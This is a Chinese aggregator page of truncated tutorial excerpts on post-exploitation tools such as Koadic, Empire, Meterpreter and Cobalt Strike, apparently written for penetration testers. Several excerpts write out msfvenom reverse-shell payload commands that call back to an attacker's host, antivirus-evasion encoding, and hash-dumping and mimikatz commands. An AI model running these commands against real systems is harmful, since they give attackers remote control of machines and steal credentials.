有趣的后渗透工具 Koadic】的更多相关文章

koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进行大部分的操作,其核心兼容性支持WindowsXP到Window 10的环境中使用,Koadic的相比于其他的后门程序来说更轻便,该工具通过调用系统的一些命令来完成Shell的反弹工作,因为调用的是系统的模块,所以天生免杀.你只需要在目标主机上执行一条命令,即可完全控制目标主机,该工具在圈内有一个别…
前言: 在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧. 首先把项目克隆到本地: 项目地址 https://github.com/zerosum0x0/koadic.git 然后解压,如果你要安装到你指定的目录就先cd到那个目录在下载,我是复制到那了,所以我解压.如下图 运行koadic cd koadic-master/           //cd到软件目录 sudo ./koadi…
一.前言 Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学.安全通信和灵活的架构之上.Empire实现了无需powershell.exe就可运行PowerShell代理的功能.快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中 二.empire使用详解 1.Empire 的安装 git clone https://github.com/EmpirePro…
EggShell是一款基于Python编写的iOS和macOS的后渗透利用工具.它有点类似于metasploit,我们可以用它来创建payload建立侦听.此外,在反弹回的session会话也为我们提供了许多额外的功能.例如文件的上传/下载,拍照,定位,shell命令执行,权限维持,提权,密码检索等.在服务器通信方面EggShell则采用了128位AES端到端的加密,并同时能够处理多个客户端程序.这是一个概念验证工具,适用于在你自己的机器上使用.有关更多详细信息请访问:http://lucasj…
Enumy是一款功能强大的Linux后渗透提权枚举工具,该工具是一个速度非常快的可移植可执行文件,广大研究人员可以在针对Linux设备的渗透测试以及CTF的后渗透阶段利用该工具实现权限提升,而Enumy运行之后将能够帮助研究人员枚举出目标设备中常见的安全漏洞. 前言 哪些人应该使用Enumy 1.渗透测试人员,可以在目标设备上运行Enumy,并报告发现的安全问题: 2.CTF玩家可以利用Enumy来识别他们原本可能会错过或忽略的东西: 3.想识别本地设备中安全漏洞的话,同样可以使用Enumy:…
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法. 贴心提示:为提高教学效果,文章内的配图大部分是GIF,担心流量的知友请尽量在WIFI环境下观看! 目录 第一节 初识Met…
0x00 工具介绍 前言 BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法.其二进制编译地址为: https://github.com/AlessandroZ/BeRoot/releases 它将作为后开发模块被添加到pupy(Pupy是一个开源,跨平台(Windows,Linux,OSX,Android),多功能RAT远程管理工具和后开发工具,主要用python编写)项目中(因此它将在内存中执行,而不会在硬盘中执行). 需要注意的是,这款工具…
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163.132 WindowsXP机器IP:192.168.163.134 如果以及获取了目标服务器的控制权之后,如何扩大战果? 所以我们首先需要一个已经获取了控制权的目标机器 我直接用msfvenom工具来生成:这里的参数我在前面介绍过了,不再多说 然后我利用Apache传给WindowsXP机器: OK…
横向渗透工具分析结果列表 https://jpcertcc.github.io/ToolAnalysisResultSheet/ 攻击者利用的Windows命令 https://blogs.jpcert.or.jp/ja/2015/12/wincommand.html 1.exe启动缓存文件目录 通过搜索.pf文件可以确认恶意程序启动的时间.目录位置在["C:\Windows\Prefetch"] 2.常用命令 攻击者通常用于收集受感染终端信息的命令 1 tasklist 2 ver…
i春秋作家:jasonx 前言:由于这个VPN节点服务器是之前拿到的,一直没时间做进一步渗透,昨天看到我蛋总表哥发红包,然后我运气爆表抢了个运气王,再加上好久没发文章了,所以就抽空测试下咯. 0×01 kali反弹shel进行测试 Kali生成一个payload这里生成IP填写的是我外网IP地址msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=111.111.111.111 LPORT=808…
我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的. 该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势. 我依次演示该工具的三种利用场景 1)当你远程控制对方主机的时候,管理员正好用putty连接着远程主机 这种情景,我们只要直接注入命令到当前的putty进程,就可以利用,非常简单,缺点是没有回显. 使用puttyRider.exe –l 查看当前进程中putty正在连接…
在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 run hashdump #导出密码的哈希 load kiwi #加载mimikatz ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的…
windows系统-web渗透工具-AWVS ACUNETIX WEB VULNERABILITY SCANNER(AWVS) Awvs是一款很出名的web安全扫描器,属于windows系统平台下最流行的扫描器之一,是商业版本[有破解版],相对开源软件,较为细化.支持AJAX.JavaScript,对客户端的脚本代码支持,会更好,能更容易发现隐藏更深的URL地址等. 1.AcuSensor 灰盒测试[AWVS最大的特点其他扫描器不具备] #需服务端布置agent 发现爬网无法发现文件 额外的漏洞…
难易程度:★★★阅读点:python;web安全;文章作者:xiaoye文章来源:i春秋关键字:网络渗透技术 前言python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天我们就来谈谈python在渗透测试中的应用,让我们自己动手打造自己的渗透工具集. 一.信息搜集--py端口扫描小脚本端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本.端口扫描小脚本: [Python] 纯文本查看 复制代码 ?…
python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天我们就来谈谈python在渗透测试中的应用,让我们自己动手打造自己的渗透工具集. 难易程度:★★★阅读点:python;web安全;文章作者:xiaoye文章来源:i春秋关键字:网络渗透技术 一.信息搜集–py端口扫描小脚本端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本.端口扫描小脚本: #coding: utf-8 import so…
生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex 传到测试机执行后得到反弹shell msfconsole msf > use multi/handlermsf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(multi/handl…
网络漏洞攻击工具 Metasploit 先msfupdate升级: 然后选择msfconsole: 接下来: set LHOST 本机IP地址 setLPORT setg PAYLOAD windows/shell/reverse_tcp setg RHOST 目标IP地址 setg port set target 随意数字 exploit 这样就可以反弹一个cmd shell了. 密码破解 Hydra 多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,s…
常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,system看看网卡信息 只有一块网卡,处于10.4.22的私网地址在这里,如果我们想要通过这台机器对内网进行渗透,首要工作就是进行内网探测,介绍几个方法0x00如果你只是需要对内网的业务主机进行渗透,那么可以优先查看一下hosts,针对hosts中的主机针对性渗透0x01如果想要对整个C段主机进行渗透…
 xss平台搭建 1.申请一个云主机来进行建站:149.28.xx.xx 2.安装lnmp: wget http://soft.vpser.net/lnmp/lnmp1.5.tar.gz -cO lnmp1.5.tar.gz && tar zxf lnmp1.5.tar.gz && cd lnmp1.5 && ./install.sh lamp  如果想安装lanmp,就把最后的“lamp”修改为“lanmp” 如果安装lamp建议安装如下图所示版本配置:…
0x00 整理的一些后渗透提权需要用到的一些漏洞,后渗透提权的时候可以看一下目标机那些补丁没打,再进行下一步渗透提权. 0x01 CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019)CVE-20…
0x01 简介 Cobalt Strike集成了端口转发.扫描多模式端口监听Windows exe木马,生成Windows dll(动态链接库)木马,生成java木马,生成office宏病毒,生成木马捆绑钓鱼攻击,包括站点克隆目标信息获取java执行浏览器自动攻击等等. 是一个鼎鼎大名的后渗透集成平台! cobalt strike采用的是服务器端+客户端的模式,可以支持多客户端同时进行工作的效果. 本教程将包含一个服务器端以及一个客户端. 本教程中服务器端为debian:客户端为windows7…
在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp靶机 192.168.190.140 生成木马 监听反弹shell上线 信息收集: ============================================================================================================…
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患. 本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进行后渗透测试. 一.获取Meterpreter会话 Meterpreter 是msf的一个payload,目标执行之后,…
1. Aircrack-ng Aircrack-ng是用来破解WEP/WAP/WPA 2无线密码最佳的黑客工具之一! 它通过接收网络的数据包来工作,并通过恢复的密码进行分析.它还拥有一个控制台接口.除此之外,Aircrack-ng还利用标准的FMS(Fluhrer.Mantin和Shamir)攻击,以及一些优化(如KORK攻击和PTW攻击)来加速攻击. Aircrack-ng 2. Hydra 九头蛇使用暴力攻击的方式,几乎可以破解任何远程身份验证服务.它支持50多种协议,包括ftp.https…
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令.脚本及使用方式.包含信息收集.提权.注册表操作.令牌操纵.哈希利用.后门植入等. 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有…
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患. 本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进行后渗透测试. 一.获取Meterpreter会话 Meterpreter 是msf的一个payload,目标执行之后,…
Metasploit 高阶之后渗透 01信息收集 应用场景: 后渗透的第一步,更多地了解靶机信息,为后续攻击做准备. 02进程迁移 应用场景: 如果反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的,那么对方一旦关闭掉程序,我们获取到的meterpreter会话就会随之关闭,所以把会话进程注入到其他常见的系统进程如explorer.exe是一个好方法 03.内网扫描 应用场景: 如果攻击者通过某个漏洞入侵了一个系统,并取得了meterpreter终端,但这台机器…
Cobalt Strike安装 系统要求 Cobalt Strike要求Java 1.8,Oracle Java ,或OpenJDK . 如果你的系统上装有防病毒产品,请确保在安装 Cobalt Strike 前将其禁用 #团队服务器 Cobalt Strike 分为客户端组件和服务器组件.服务器组件,也就是团队服务器,是 Beacon payload 的控制器,也是 Cobalt Strike 社会工程功能的托管主机.团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录.…
实验目的 学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面 实验原理 利用Meterpreter生成木马,利用木马控制靶机进行远程桌面的攻击 实验内容 利用Meterpreter后渗透阶段模块来开启靶机远程桌面 实验步骤 渗透机H007003010kali账号密码:root/toor 靶机H007003010win2003账号密码Administrator/123456 Meterpreter Shell的生成过程此处不再赘述,详情可以查看课程Meterpreter核心命令 1.针…
文章来源i春秋 入坑Ubuntu半年多了  记得一开始学的时候基本一星期重装三四次=-= 尴尬了 觉得自己差不多可以的时候 就吧Windows10干掉了 c盘装Ubuntu 专心学习.   这里主要来说一下使用Ubuntu的正确姿势 Ubuntu(友帮拓.优般图.乌班图)是一个以桌面应用为主的开源GNU/Linux操作系统,Ubuntu 是基于Debian GNU/Linux,支持x86.amd64(即x64)和ppc架构,由全球化的专业开发团队(Canonical Ltd)打造的. 一般家庭机…